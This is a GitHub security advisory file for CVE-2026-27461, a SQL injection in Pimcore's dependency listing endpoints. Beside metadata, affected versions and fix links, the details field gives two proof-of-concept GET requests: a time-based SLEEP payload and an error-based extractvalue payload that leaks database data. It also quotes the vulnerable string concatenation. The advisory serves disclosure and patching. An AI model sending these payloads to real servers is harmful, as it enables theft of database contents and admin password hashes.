-
Notifications
You must be signed in to change notification settings - Fork 583
Expand file tree
/
Copy pathGHSA-vxg3-v4p6-f3fp.json
More file actions
95 lines (95 loc) · 3.68 KB
/
GHSA-vxg3-v4p6-f3fp.json
File metadata and controls
95 lines (95 loc) · 3.68 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
{
"schema_version": "1.4.0",
"id": "GHSA-vxg3-v4p6-f3fp",
"modified": "2026-02-24T20:03:26Z",
"published": "2026-02-24T20:03:23Z",
"aliases": [
"CVE-2026-27461"
],
"summary": "Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause",
"details": "The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.\n\nAffected code in models/Dependency/Dao.php:\n- getFilterRequiresByPath() lines 90, 95, 100\n- getFilterRequiredByPath() lines 148, 153, 158\n\nAll 6 locations use direct string concatenation like:\n\n \"AND LOWER(CONCAT(o.path, o.key)) RLIKE '\".$value.\"'\"\n\nNote that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.\n\nEntry points (pimcore/admin-ui-classic-bundle ElementController.php):\n- GET /admin/element/get-requires-dependencies (line 654)\n- GET /admin/element/get-required-by-dependencies (line 714)\n\nThe controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.\n\nPoC (time-based blind):\n\n GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{\"type\":\"string\",\"value\":\"x' OR SLEEP(5)#\"}]\n\nIf vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).\n\nPoC (error-based extraction):\n\n GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{\"type\":\"string\",\"value\":\"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#\"}]\n\nReturns the MySQL version string in the error response.\n\nRequires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.",
"severity": [
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "11.5.15"
}
]
}
],
"database_specific": {
"last_known_affected_version_range": "<= 11.5.14.1"
}
},
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.3.3"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27461"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/pull/18991"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6f4"
},
{
"type": "PACKAGE",
"url": "https://github.com/pimcore/pimcore"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.3"
}
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T20:03:23Z",
"nvd_published_at": "2026-02-24T04:15:58Z"
}
}